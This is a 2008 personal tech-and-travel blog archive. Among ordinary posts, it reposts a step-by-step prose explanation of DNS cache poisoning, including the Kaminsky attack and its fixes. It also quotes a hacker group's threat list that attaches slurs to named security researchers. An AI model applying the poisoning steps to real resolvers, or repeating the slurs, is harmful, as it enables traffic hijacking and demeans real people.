woensdag 31 december 2008

End of the year, show me the stats!

This little vanity blog is getting at least some hits from you guys [thanks!] and I thought it would be nice to share with you what you are looking for, at least when you are using your google fu:

1. google street view amsterdam
2. mokum von amsterdam
3. amsterdam iphone
4. street view amsterdam
5. firefox fullscreen os x
6. "put your mouth where your money was"
7. google street view netherlands
8. failed keyboard-interactive/pam for invalid user
9. amsterdam street view
10. forgotten hope 2.0.rar

And from google you came:
1. google 2,257
2. yahoo 19
3. aol 17
4. search 13
5. altavista 4
6. msn 2
7. lycos 1
8. netscape 1

You love my root and it shows:
1. / 2,629
2. /2008/07/google-car-in-amsterdam-holland.html 293
3. /2008/01/sound-noise-good-neighbours.html 280
4. /2008/08/best-things-in-life-are-free.html 188
5. /2007/09/bring-it-on.html 182
6. /2008/05/ssh-brute-force-botnet.html 147
7. /2008/08/pdps-older-mailbox-volumes-compromized.html 114
8. /2008/03/firefox-fullscreen-on-osx.html 110
9. /2007/09/full-body-scan.html 99
10. /2008/07/battlefield-2-new-patch-15-and-3-new.html 86

Your tools? As expected:
1. Firefox
2. Internet Explorer
3. Safari [iPhone's I am sure]
4. Opera
5. Mozilla
6. Chrome
7. Mozilla Compatible Agent
8. Netscape
9. Camino
10. HPiPAQ910

Your OS:
1. Windows 3,340 77.19%
2. Macintosh 745 17.22%
3. Linux 175 4.04%
4. iPhone 41 0.95%
5. (not set) 14 0.32%
6. FreeBSD 5 0.12%
7. SunOS 3 0.07%
8. SymbianOS 3 0.07%
9. Nintendo Wii 1 0.02%

Hope this satisfies your never ending lust for facts & figures.

dinsdag 30 december 2008

dinsdag 23 december 2008

Mantra from the Dalai Lama

1. Take into account that great love and great achievements involve great risk.

2. When you lose, don't lose the lesson.

3. Follow the three R's:
Respect for self
Respect for others and
Responsibility for all your actions.

4. Remember that not getting what you want is sometimes a wonderful stroke of luck.

5. Learn the rules so you know how to break them properly.

6. Don't let a little dispute injure a great friendship.

7. When you realize you've made a mistake, take immediate steps to correct it.

8. Spend some time alone every day.

9. Open your arms to change, but don't let go of your values.

10. Remember that silence is sometimes the best answer.

11. Live a good, honourable life. Then when you get older and think back, you'll be able to enjoy it a second time.

12. A loving atmosphere in your home is the foundation for your life.

13. In disagreements with loved ones, deal only with the current situation. Don't bring up the past.

14. Share your knowledge. It's a way to achieve immortality.

15. Be gentle with the earth.

16. Once a year, go someplace you've never been before.

17. Remember that the best relationship is one in which your love for each other exceeds your need for each other.

18. Judge your success by what you had to give up in order to get it.

19. Approach love and cooking with reckless abandon.

zondag 14 december 2008

woensdag 26 november 2008

Faruk Yazicilar is king!

WOW! Was my first impression when I coincidentally walked into [read 'Paradise Lost' for some history on the name] the work of the Istanbul based artist Faruk Yazicilar.

WOW! What a strong image, such constrained but strong expressions.

I would really like to meet this man and see more of his work and if all works out: get one as a present to my beloved.

If only there was more of his work online, till the time I meet him...

And on a site note: why the sudden interest late october from telia stofa a/s, opal telecommunications internet service provider and the arts institute at bournemouth for my domains do know evil?

dinsdag 25 november 2008

I want a Nixie Watch

Forget the slick and expensive gold bling bling crap!

The Nixie Watch is the real deal and the only thing one can give a true geek.

Made by a super geeky dude who is into cathodes like a tornado is into trailer parks, this watch is something I can no longer live without.

vrijdag 21 november 2008

New MacBook Pro, now what?

It is the same on all new machines: it takes a while to get it look & feel like you like it most.

The patches
FireFox plus noscript & adblock
Picasa Web Albums Uploader
Google Earth

And then some, but by the time this is done... man!

roxio toast

And more later.

More like:

vrijdag 31 oktober 2008

Time to go home


Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 tarih ve 2007/1705 nolu kararı gereği bu siteye erişim TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI'nca engellenmiştir.

Access to this web site is banned by "TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI" according to the order of: Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 of 2007/1705.

woensdag 29 oktober 2008

Hip Istanbul, a hot view & good people.

So let's talk about the good stuff in Istanbul. The free people. The scene that has [a little more] money and knows where to go.

The evening started of at a friends place. He rents an apartment in the groovy district Cihangir. It has everything one could want from a [temporary] place. Lovely old paintings on the stairways, where the teeth of time have left there marks, the stains of water leaking and many a dent of all the people and goods going up and down in the never ending struggle for life and security.

The details in the apartment all tell a story or two. About the original intent and the good & the bad. The attempts to improve or to restore. All have left their traces.

Later that night I went to a place called 5.Kat [in English: the fifth floor]. What a lovely view! Great view over the Bosporus and an even better crowd. Then enters the owner: Yasemin Alkaya. She just to work as an actress and now runs one of the hottest bars|restaurants in town.

She cooks, waiters, hosts and entertains her guests with such ellegance and style that it was love at first sight for me. I will be back here, as often as I can.

Other places:
Sabahattin Fish!
Develi Kebab
Changa International
Ulus 29 see and be seen

With thanks to Erdal Gökyıldırım for his tips and comments :D

vrijdag 17 oktober 2008

Put your mouth where your money was.

Be fearful when others are greedy, and be greedy when others are fearful.

How difficult a message is that? Well it seem really really difficult. The investor eveybody loves to love, Warren Buffett, is making a bundle and screaming on the top of his lungs that he does and so should you. Buy equities.

vrijdag 3 oktober 2008

The challenges @ Dagobert Duck

Because my ties with a couple of people who work for @ at SURFnet, I accepted an invitation to do a presentation. The audience consists of mainly university students and technical employees of universities so the question was if I could share some light on the differences of working at really big companies.

I tried :P

The differences are so extreme that sometimes it seems as if our methods and challenges have no shared needs or issues. This is not true. We fight the same monsters, technically, we just have a different landscape.

Think of it like BF2 & CoD.

A fun day with some excellent content brought by very capable people so I am happy to say that these where 2 days well spend. Since this is a university environment, speakers where much more encouraged to give some juicy details, details you would normally not out with a mic in your face. The questions are of such relevance to the issues discussed and not aimed at getting quotable 'bedroom secrets' so many a PR person would feel uncomfertable with the intemicy of details exchanged.

Exectly the kind of details & environment I like and can actually use in my day to day job.

SURFnet at all: thank you!

zaterdag 27 september 2008

The best baklava from Istanbul!

I love real good Baklava. The best in Istanbul you have to buy at Karakoy Gulluoglu in the Rihtum street, Karakoy. It is close to the Galata Tower.

See for yourself:

Grotere kaart weergeven

I met the founder, Mr Mustafa Gullu who started the shop and workplace in 1949. Since then not a single other shop was opened. If you want the best Baklava in Istanbul, you have to go here. No alternatives :D

Since I normally stay at the Moevenpick and it takes about 30 minutes of frantic driving throug the city. Cab driving in turkey is something that follows a few simple rules:
  1. Change lanes, just because you can
  2. Do NOT look to the cars in front of you
  3. Keep no distance
Being a passenger means you avoid sitting next to the drivers and concentrate on anything but the traffic...

zondag 21 september 2008

Most pathatic, hands down.

Of course picking on Microsoft has always been easy. Way too easy. So for me the laughing stock of this decenia has always been the inspired leader of Vodaphony and the AV bosses.

But MS has out done most of the attempts for gaining the top spot. Since absolutely no one wants or uses Vista, a low life MS marketing droid came up with the brilliant plan to show people Vista and not tell them it was Vista and record their happy feelings...Did not work, so plan B: get a well know dude to sell your stuff, that failed again.

That did not really work, so then they moved to the oldest trick in the book: if you can't beat them, copy them. So the market got a piece of MS interpretation of the fabulous "Hi I am a Mac, and I am a PC" commercials from Apple, but then done by Microsoft.

Now quess what? The stuff has been made on a ... MAC :D

Rock on loosers!

zondag 14 september 2008

Hurricane Electric roxs on!

Years ago I hosted one of my servers over at Hurricane Electric [still LOVE that domain!]. At the time a small hosting company with Linux knowledge and a heart on the right spot.

The interface to the company was, well, minimal. A simple page with no 2.0 features or 1.0 features for that mater :D The service was good, even with complicated stuff like mail hosting and DNS stuff they would always have s good solution available. At times the tech guy [Mike Leber] would even ssh to my server and assist, really hands on & friendly.

Now they are the most reliable hosting company in the month August of 2008. Congratulations!

They run the tenth largest international network in the world.

Might be a nice idea to setup a total ipv6 host there...

zondag 7 september 2008


de prinses voelt met een natte vinger
of haar strijkbout heet genoeg is
trekt haar kuisheidsgordel op
een beetje

haar witte ridder?
een rammellend harnas
een mannetje met jeuk

de prinses wacht
op de hitte van haar bout
tijd verstrijkt

-- Emma Klage

vrijdag 29 augustus 2008

Bomb bomb bomb Iran!

All systems go! The dutch secret service has retreated all their spies from Iran and one of them informed the media that this is because the states are going to attack Iran with drones, RSN.

Coming from the Dutch secret service directly, this has to be true :P

Let's hope that at least CNN has some webcam's rolling so we can enjoy the show.

donderdag 28 augustus 2008

julie moult is an idiot...

...at least, that is what google gives when you search for "julie moult". The lady apparently thought she understood the concept of google bombing enough to write about it and... well, it back fired.

There are plenty people who do not like her style, her subjects and even the newspaper she writes for and of course the community loves making a point.

As one blogger puts it: Julie Moult is an idiot. And we're here to let her know.
Stealer of images (from top fellow Beau Bo d'Or) and all-round Daily Mail Hackette, Julie needs a wee lesson in the art of Googlebombing...

Google gives about 330 for "julie moult" +idiot right now. Guess that will be many more soon.
Update [14-sept-2008] 43.000 for "julie moult" +idiot right now.
Update [14-dec-2008] about 2,440 for "julie moult" +idiot

zondag 24 augustus 2008

SATA Windows DVD ServicePacks :(

Since my last still standing PC is equipped with JMicron 363 SATA on board and SATA disks only, installing Windows is somewhat of a bitch since the last floppydrive left the house about 8 years ago.

XP is from the era that every machine still had a floppy drive so when you need to load an extra driver the only option you got is... supplying these drivers on a floppy.

Luckily there are more people who suffer from this handicapped feature and did something about it: nlite is the solution for XP. It enables one to easily make a slipstreamed XP image with added drivers [SATA comes to mind], Service Packs, patches, regional settings, XP key and much more.

Untill a week ago, I would rely on InfraRecorder [open source] to burn ISO's to CD's and DVD's but I noticed an issue with an ISO I had downloaded and tried to burn on a DVD: it was in CD format so the results where not what I expected. ImageBurn is much more advanced and able to convert CD format to DVD, on the fly. It does not get much easier then that.

So armed with a slipstreamed ISO, packed with SATA drivers, SP3 and then some, I booted the beast to be hit by various BSoD's... So that was my last attempt to have a pure window's machine.

Microsoft, it was good as long as it lasted but this is my final goodbye. I will still use your OS'es at times [for games & on dreaded corporate machines!] but I will not ever spend a cent on it again.

Vista might be lame to most, for me it is a bridge too far and something I am not even looking at.

Photo by algo

vrijdag 15 augustus 2008

DNSsec as is a solution, right?

Since the latest DNS patch horror for those who _still_ use BIND over DJBDNS or OpenDNS, a lot of smart people who know a lot more about DNS then you & me together have been pointing to DNSsec as an even better cure.

DNSsec is a bitch to setup and use, even the guruus over at SANS are reluctantly and carefully touching the DNSsec waters. To actually benevit from the sec part of DNSsec, the end user would need to 'see' something like a nice big fat green thingy when connected to a DNSsec protected website, right?

Unfortunatly DNSsec is still not really widely deployed. There is no buildin firefox [or anyother browser for that matter] support.

Well for Firefox there is an extention for all your needs, to for DNSsec there is too. Called the DRILL extention. It would not install on my FF 3.0.1 since the DRILL exention ‘will not be installed because it does not provide secure updates’. Solution: go to the about page, create a new bolean called extensions.checkUpdateSecurity and set it to false. Try again & fail again: the extention does not support FF 3.x

So much for the nice effort.

KPN Internet Mobile + HuaWei + OSX == horror


For my MAC PowerBook A couple of months ago I bought a PCMCIA UMTS card with a KPN subscription for Mobile Internet. Costs a couple of euro but it provides me with Internet access when not being able to connect to a cable, for whatever reason.

I bought a MacBook a little later and since it does not have a PCMCIA slot, got myself a HuaWei E270 USB device to go with it. The HuaWei USB will automount, show the drivers that need to be installed and does so with all the correct settings preloaded: if one runs some sort of windows.

I do not.

Luckily KPN provides a dmg with the correct config from their website for us 'few' MAC users. Nice.

Unfortunatly my connection suffers from various problems:
  • connection speed sucks: 100 KB/s toprate up & down
  • HuaWeidrivers kernel panics OSX
  • syslog takes up to 80[!!!] % of the CPU when beeing flooded by the HuaWei driver
Of course the KPN helpdesk offers 'solutions' that do not cut ice:
  1. Use another OS [riiight!]
  2. Use another machine [Ok, give me one!]
  3. Have the HuaWei driver installed by a service point [it is!]
Google assistance requiered. I took a random [1 in a million :P ] syslog line "RemovefromQueue: Enter, MaciSize" and found more people who are complaining their syslog was beeing filled up by the HuaWei driver messages, unstable connections & other jazz. In the HuaWei forums people are going rampant suggesting to go wired DSL because this seems not to be resolved although the user x00114004 [who's profile claims he works at HuaWei] says he has sent the information to the R&D department. Over at the Apple Support forums it is the same. In Australia too.

Most complaints are about the E220, but some mention the E226 and mine is the E270.

Luckily there is an updated version of the E270 driver available for OSX, unfortunatly it is wrapped in a .EXE, sigh...

So much for using China products sold by the KPN.

donderdag 14 augustus 2008


versleten ruggen
uitgebluste vuurtorens
gemankeerde meiers
droevige geeltjes
jammerlijke joetjes
verlopen vijfjes
kansarme knaken
zielige pieken
hongerende heitjes
snikkende stuivers
waardeloze centen
-- Emma Klage

GOOD NEWS: Cervelat-Krise passed!

Life saver: The Brazilian Zebu*-cow-intestine can be imported into Europe again.

After the bovine spongiform encephalopathy crisis it was verboten to import specific parts of the cows into Europe.

Since the Cervelat.CH needs the best available bowels for it's perfect curve & taste, only the Zebu's intestine can do. Thank G*d this is allowed again.

* Well actually it is more [5/8] Chanchim, but they look like Zebu.

woensdag 13 augustus 2008

Meester Boukema

als je niet buiten roken kunt
kunt je buiten roken

is fout

als U niet buiten roken kunt
kunt U buiten roken

is goed

dinsdag 12 augustus 2008

The best things in life are free...

...but you can give them to the birds and bees, I want money!

How is that, you give away a kick ass front-end, secure IMAP & POP, more storage space then anyone and a near perfect service and everyone is silently using ad-blockers to prevent you from making money and you accept that. But when there is ONE DAY of availability issues with that kick ass service, people go ape shit and you even apologize!

I would like to thank the gmail team for exceeding all my expectations, consistently.

zondag 10 augustus 2008

iPhone 2.0 but where is the...

..normal functions, like:
How come some hippy hackers can do all the cool stuff but Apple doesn't?

Even the PwnageTool looks better then iTimes FFS!

pdp's older mailbox volumes compromized, DUH!

The "Great Council of Internet Superheros" [internetsuperheros@hushmail.com] has compromized Petko D. Petkov [AKA pdp]'s, older mailbox RAR volumes and posted lots of it on RapidShare.

They threaten a whole bunch of people:

The Judge for Security Sellout Crimes hereby wages war against:

|/| Tom Ferris @ adobe.com security-protocols.com
|/| Matasano LLC @ matasano.com sockpuppet.org
|/| Nate Lawson @ rootlabs.com
|/| Joanna Rutkowska @ trannyvideos.com
|/| Petko D. Petkov @ googlemail.com gnucitizen.org
|/| Matt Richard @ idefense.com
|/| /\) Toralv Dirro @ mcafee.com AVERT Labs
|/|/\/ Dan Kaminsky @ ioactive.com arkham.wstn.ioactive.com
|/|\/ Dror Shalev @ sec.drorshalev.com
(\\\) Dragos Riuiu @ gaysecwest.com
(\\\) Thorsten Holz @ honeynet.org mwcollect.org
(\\\) Andre Protas @ eeye.com mwcollect.org (IDA leaker)
(\\\) Gadi Evron @ linuxbox.org kosherobese.org
(\\\) Valdis Kletnieks @ vt.edu & his alcoholic mother
/\\/\ Robert Lemos @ securityfocus.com
/ ,^./\ Ryan Naraine @ zdnet.com gmail.com
/ / \/\ Beyond Security @ Isreal, Gadi's bitch tits
/ / \/\ SecReview @ blogspot.com (gay reviews)
( ( )/) Juha-Matti Laurio @ netti.fi & Isreal (blog moron)
| | |/| Sergio Alvarez @ gmail.com nruns.com (AV rapist)
| | DIE |/| Theo de Raadt @ cvs.openbsd.org gaydate.com
| | |/| Alan Shimel @ yahoo.com stillsecure.com
( ( )/) Lance M. Havok @ dumb.lame.idiot.pl
\ \ / / kingcope/kcope @ gmx.net lame.idiot.de
\ `---' / Jennifer Granick @ whitefat.defender.lame
`-----' David Maynor @ gmail.com erratasec.com apple.com
Andrew Cushman @ microsoft.com gossip.sec

I wonder where this is going to end. Some big names here and I am sure not all will take it laying down. The compromise of pdp's account should warn people...

donderdag 7 augustus 2008

Andrea Pininfarina --- morte

On a Vespa [style] Andrea Pininfarina the CEO of the best car designing companies ever, has died.

He and his Vespa scooter collided with a Ford Fiesta[FFS] about 8:15 a.m. in Trofarello.

Andrea died, Vespa broke, Fiesta lives: where is the justice in this?

dinsdag 5 augustus 2008

Never ever ever talk to the police

Do not trust me, trust someone who knows:

As an investigator, I can only agree: everything you say can and will be used against you. One of my most respected teachers on the subject taught me an other trick. It comes down to screaming 'I NEED HELP' and I will leave it to the reader to think up the context as in when the time has come to [ab-]use this.

Most people are not even aware that LYING is allowed in the process of interrogation...

Thanks Bruce

zaterdag 2 augustus 2008

My TraceRoute for OSX?


checking sys/xti.h presence... no
checking for sys/xti.h... no
checking for floor in -lm... yes
./configure: line 6742: syntax error near unexpected token `1.0.0,'
./configure: line 6742: ` AM_PATH_GTK(1.0.0, CFLAGS="$CFLAGS $GTK_CFLAGS"'

MyTraceRoute is a kick ass network connection 'debug' implementation that sends a sequence of ICMP ECHO requests to each hop to determine the quality of the link to each machine. As it does this, it prints running statistics about each machine.

iPhone:~ root# ./mtr --report www.google.com
HOST: iPhone Loss% Snt Last Avg Best Wrst StDev
1. 0.0% 10 2.0 9.6 1.9 72.4 22.1
14. 66.7% 9 24.4 63.0 20.7 143.8 70.0
15. 87.5% 8 23.7 23.7 23.7 23.7 0.0
16. 25.0% 8 38.0 37.0 35.1 39.8 1.7
17. ??? 100.0 8 0.0 0.0 0.0 0.0 0.0
18. 14.3% 7 46.7 44.4 36.9 50.6 5.3
19. 85.7% 7 36.8 36.8 36.8 36.8 0.0

Simple, light & uses stuff we have been using for years, just a little better. The way I like it. It runs nicely on the iPhone, install it via Cydia, but for the love of cheese I can not compile it on my OSX Darwin MacBook.


vrijdag 1 augustus 2008

Switzerland FTW!

1st of August is Switzerland's national day. On this day swiss people burn stuff, while speaking a funny language.
One of the two most beutifull countries in the world, in my book. And certainly the one country with the best possible implementation of a democracy.
They do not work to efficient, folowing Canada and being trailed by Trinidat & Tobago on the GDP list, but that makes it only extra pleasant to live there.
Today I wish all people with a @.CH email address a super nice day with many friends and even more fire!

dinsdag 29 juli 2008

Search and you will WHAT???

As much as I loved stumbling on google when it was starting up, as eager I have been finding even better engines.

It is amazing how difficult it is to build a better google. The latest attempt is called cuil and it too, fails.

I challance you to find anything. So far only the simplest of searches yields useable results. Like searching for linkedin actually gives www.linkedin.com as a first hit: well done. Searching for 'mokum von Amsterdam' give two pages of something I once posted on the Wired blog and that has been replicated 1.000 times on other sites: no link to this blog or anything usefull.

Try searching for 'ING bank' in google and in cuil. Tell me why on earth ING Poland & Timisoara show up in Cuil on page one? How on earth did these guys fill up their repository?

Altavista does better FFS! [as a matter of fact, altavista showed me a nice bar in Berlin I will visit next time around].

Lessons learned: stick to google, use altavista more often, wait till cuil grows up, if ever.

maandag 28 juli 2008


hun hebben zij
klaagt de klant tegen de kapper

hun hebben zij
is niet goed Nederlands, meneer
wist de knipper

zij hebben haar, meneer
zij hebben haar

-- Frans Engels

vrijdag 25 juli 2008

Why OpenDNS [if you can not run DJBDNS]

To test, I let DHCP update my resolve file with the DNS servers of my [horribly slow!] KPN Internet mobile connection:

bash-3.2# cat /etc/resolv.conf

The top two address are my 'normal' DNS entries, from the fine folks of OpenDNS [who where secure since day one].

Now let's check the DNS servers from both OpenDNS & KPN mobile with a simple dig:

bash-3.2# dig @ +short porttest.dns-oarc.net TXT
" is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"
bash-3.2# dig @ +short porttest.dns-oarc.net TXT
" is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"

bash-3.2# dig @ +short porttest.dns-oarc.net TXT
" is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
bash-3.2# dig @ +short porttest.dns-oarc.net TXT
" is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"

Of course, nothing beats djbdbs, but for day today use, OpenDNS p0wnserz your provider's DNS hands down.

To keep your resolve.conf file save and clean on OSX and prevent DHCP from updating it, set the immutable bit:
chflags uchg /var/run/resolv.conf
To remove the flag use:
chflags nouchg /var/run/resolv.conf

woensdag 23 juli 2008

CloudTablet or CloudPannel?

Interesting idea over at TechCrunch: a simple, US$200 WebTablet, running FireFox & Skype.

For me this is the ultimate CloudPannel [zero hits ATM], or CloudTablet [less then 350 hits ATM], whatever you prefer.

I would like 5 or 10 laying around the house for easy web 2.0 access!

dinsdag 22 juli 2008

DNS issues released

The cat is out of the bag. Yes, Halvar Flake figured out the flaw Dan Kaminsky will announce at Black Hat.


Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.

Bob goes to to a deli, to get a sandwich. Bob walks up to the counter, takes a pointy ticket from a round red dispenser. The ticket has a number on it. This will be Bob’s unique identifier for his sandwich acquisition transaction. Note that the number will probably be used twice — once when he is called to the counter to place his order and again when he’s called back to get his sandwich. If you’re wondering, Bob likes ham on rye with no onions.

If you’ve got this, you have the concept of transaction IDs, which are numbers assigned to keep different transactions in order. Conveniently, the first sixteen bits of a DNS packet is just such a unique identifier. It’s called a query id (QID). And with the efficiency of the deli, the QID is used for multiple transactions.


Until very recently, there were two basic classes of DNS vulnerabilities. One of them involves mucking about with the QID in DNS packets and the other requires you to know the Deep Magic.

First, QIDs.

Bob’s a resolver and Alice is a content DNS server. Bob asks Alice for the address of WWW.VICTIM.COM. The answer is Mallory would like the answer to be

It is a (now not) secret shame of mine that for a great deal of my career, creating and sending packets was, to me, Deep Magic. Then it became part of my job, and I learned that it is surprisingly trivial. So put aside the idea that forging IP packets is the hard part of poisoning DNS. If I’m Mallory and I’m attacking Bob, how can he distinguish my packets from Alice’s? Because I can’t see the QID in his request, and the QID in my response won’t match. The QID is the only thing protecting the DNS from Mallory (me).

QID attacks began in the olden days, when BIND simply incremented the QID with every query response. If you can remember 1995, here’s a workable DNS attack. Think fast: 9372 + 1. Did you get 9372, or even miss and get 9373? You win, Alice loses. Mallory sends a constant stream of DNS responses for WWW.VICTIM.COM. All are quietly discarded —- until Mallory gets Bob to query for WWW.VICTIM.COM. If Mallory’s response gets to your computer before the legitimate response arrives from your ISP’s name server, you will be redirected where Mallory tells you you’re going.

Obvious fix: you want the QID be randomly generated. Now Alice and Mallory are in a race. Alice sees Bob’s request and knows the QID. Mallory has to guess it. The first one to land a packet with the correct QID wins. Randomized QIDs give Alice a big advantage in this race.

But there’s a bunch more problems here:

  • If you convince Bob to ask Alice the same question 1000 times all at once, and Bob uses a different QID for each packet, you made the race 1000 times easier for Mallory to win.

  • If Bob uses a crappy random number generator, Mallory can get Bob to ask for names she controls, like WWW.EVIL.COM, and watch how the QIDs bounce around; eventually, she’ll break the RNG and be able to predict its outputs.

  • 16 bits just isn’t big enough to provide real security at the traffic rates we deal with in 2008.

Your computer’s resolver is probably a stub. Which means it won’t really save the response. You don’t want it to. The stub asks a real DNS server, probably run by your ISP. That server doesn’t know everything. It can’t, and shouldn’t, because the whole idea of DNS is to compensate for the organic and shifting nature of internet naming and addressing. Frequently, that server has to go ask another, and so on. The cool kids call this “recursion”.

Responses carry another value, too, called a time to live (TTL). This number tells your name server how long to cache the answer. Why? Because they deal with zillions of queries. Whoever wins the race between Alice and Mallory, their answer gets cached. All subsequent responses will be dropped. All future requests for that same data, within the TTL, come from that answer. This is good for whoever wins the race. If Alice wins, it means Mallory can’t poison the cache for that name. If Mallory wins, the next 10,000 or so people that ask that cache where WWW.VICTIM.COM is go to


Then there’s that other set of DNS vulnerabilities. These require you to pay attention in class. They haven’t really been talked about since 1997. And they’re hard to find, because you have to understand how DNS works. In other words, you have to be completely crazy. Lazlo Hollyfeld crazy. I’m speaking of course of RRset poisoning.

DNS has a complicated architecture. Not only that, but not all name servers run the same code. So not all of them implement DNS in exactly the same way. And not only that, but not all name servers are configured properly.

I just described a QID attack that poisons the name server’s cache. This attack requires speed, agility and luck, because if the “real” answer happens to arrive before your spoofed one, you’re locked out. Fortunately for those of you that have a time machine, some versions of DNS provide you with another way to poison the name server’s cache anyway. To explain it, I will have to explain more about the format of a DNS packet.

DNS packets are variable in length and consist of a header, some flags and resource records (RRs). RRs are where the goods ride around. There are up to three sets of RRs in a DNS packet, along with the original query. These are:

  • Answer RR’s, which contain the answer to whatever question you asked (such as the A record that says WWW.VICTIM.COM is

  • Authority RR’s, which tell resolvers which name servers to refer to to get the complete answer for a question

  • Additional RR’s, sometimes called “glue”, which contain any additional information needed to make the response effective.

A word about the Additional RR’s. Think about an NS record, like the one that COM’s name server uses to tell us that, to find out where WWW.VICTIM.COM is, you have to ask NS1.VICTIM.COM. That’s good to know, but it’s not going to help you unless you know where to find NS1.VICTIM.COM. Names are not addresses. This is a chicken and egg problem. The answer is, you provide both the NS record pointing VICTIM.COM to NS1.VICTIM.COM, and the A record pointing NS1.VICTIM.COM to

Now, let’s party like it’s 1995.

Download the source code for a DNS implementation and hack it up such that every time it sends out a response, it also sends out a little bit of evil — an extra Additional RR with bad information. Then let’s set up an evil server with it, and register it as EVIL.COM. Now get a bunch of web pages up with IMG tags pointing to names hosted at that server.

Bob innocently loads up a page with the malicious tags which coerces his browser resolve that name. Bob asks Alice to resolve that name. Here comes recursion: eventually the query arrives at our evil server. Which sends back a response with an unexpected (evil) Additional RR.

If Alice’s cache honors the unexpected record, it’s 1995 —- buy CSCO! —- and you just poisoned their cache. Worse, it will replace the “real” data already in the cache with the fake data. You asked where WWW.EVIL.COM was (or rather, the image tags did). But Alice also “found out” where WWW.VICTIM.COM was: Every resolver that points to that name server will now gladly forward you to the website of the beast.


It’s not 1995. It’s 2008. There are fixes for the attacks I have described.

Fix 1:

The QID race is fixed with random IDs, and by using a strong random number generator and being careful with the state you keep for queries. 16 bit query IDs are still too short, which fills us with dread. There are hacks to get around this. For instance, DJBDNS randomizes the source port on requests as well, and thus won’t honor responses unless they come from someone who guesses the ~16 bit source port. This brings us close to 32 bits, which is much harder to guess.

Fix 2:

The RR set poisoning attack is fixed by bailiwick checking, which is a quirky way of saying that resolvers simply remember that if they’re asking where WWW.VICTIM.COM is, they’re not interested in caching a new address for WWW.GOOGLE.COM in the same transaction.

Remember how these fixes work. They’re very important.

And so we arrive at the present day.


Let’s try again to convince Bob that WWW.VICTIM.COM is

This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).

Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.

Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is!

Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was It also contained Additional RRs pointing WWW.VICTIM.COM to Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.


On a side note: can stuff no longer published but found in google's cache be copyrighted?

Geotagging iPhone gone bad :(

Great feature: geotagging the images taken with the iPhone [already the most Popular Cameraphone on Flickr].

Just imagion that you take photos during the holiday and all you need to do is dump them in, say, google earth and all pics are shown in the correct location. Right, that was the plan. Unfortunatly Apple made a couple of errors with the implementation, again.

The UIImagePicker application that is used when you email a photo from the iPhone, strips out the EXIF location data, DUH! iPhoto mutilates [strips the "Ref" tag] the EXIF geodata when resizing photos, DUH.

So what you get is third party apps that sort-of-help, like AirMe. It will upload the photo to Flickr and geotag it, but then you have to take the pic with AirMe and have NO geodata stored in the EXIF data of the photo at all, and that is bad.

Who knows, maybe if Apple would put a little less invain effort in the locking down of the iPhone they'd be able to get MMS working? Some more features in the camera? Geotagging stored correctly? How difficult is that? How come 17 year old's CAN do that but a multi bilion company can't?
Photo source

maandag 21 juli 2008


Good thief's maybe, but crooks. Living with mama till >30. Not being able to clean their own rubbish. Lovely, but lousy cars makers. And so on.

To wrap it up, even in the IT world they show up. And the pain got a name: Zibri. A thief, but then in code.

Read this to get an idea about this crook:

The following opinions are mine, and not those of the DevTeam as a whole, although many members agree with me:

Free thoughts...

There's something that's been on my chest for a while, and it's been bothering others on the team as well. The name of this particular thorn in our sides begins with the letter Z and ends with "ibri". Yes, I'm sure all of you are rolling your eyes at the "drama" we hacker "kids" are stirring up, but I'm sure if you had your work taken without permission, you would feel the same way. It's particularly galling that he is still spreading FUD on his blog in an attempt to save face. I'm going to try to address some of them in this post.

Zibri implies that our jailbreak is not "real", saying instead that our release is a "software upgrade, total internat [sic] firmware modification and custom firmware".

For him, a "real hack" works in a few minutes because it only needs to modify a few bytes here and there.

When Pwnage 1.0 was released, it was indeed the ultimate hack for the iPhone/iPod Touch. Never before had the devices been under the user's control from the very bottom up. Prior, less sophisticated jailbreaks were still subject to the whims of the kernel, which couldn't be modified because the bootloader checked its signature and refused to boot if it was incorrect.

Back in those days, the definition of "hack" above was still a feasible one, as the chain of trust ended at the kernel. Once you gained write access to the root filesystem, you could run arbitrary programs and make patches at will to many system components. Indeed, many such patches were needed, to make activation allow unapproved SIM cards, and to make Springboard display unauthorized apps.

Fast forward back to the present, and you'll see the situation has changed. Solutions that using a ramdisk simply made a change or two to the filesystem now must contend with the mighty kernel's signature checking of all installed apps and libraries. Mounting the root filesystem and modifying /etc/fstab to make it writable is quite alright, but the moment you make patches for activation or anything else, the kernel will refuse to run the modified programs, unless you can somehow steal Apple's private signing key. Furthermore, such a jailbreak would be essentially useless because the system would refuse to run any of your custom software (such as Installer.app or Cydia), again because of the lack of signatures on it.

Given the above situation, it becomes clear that if you want to use 2.0 for anything but screenshots, you either need to get ahold of Apple's signing key (start preparing your army now) or you need to patch the 2.0 kernel. Hard as we tried, we couldn't find much of an army, so we took the latter approach.

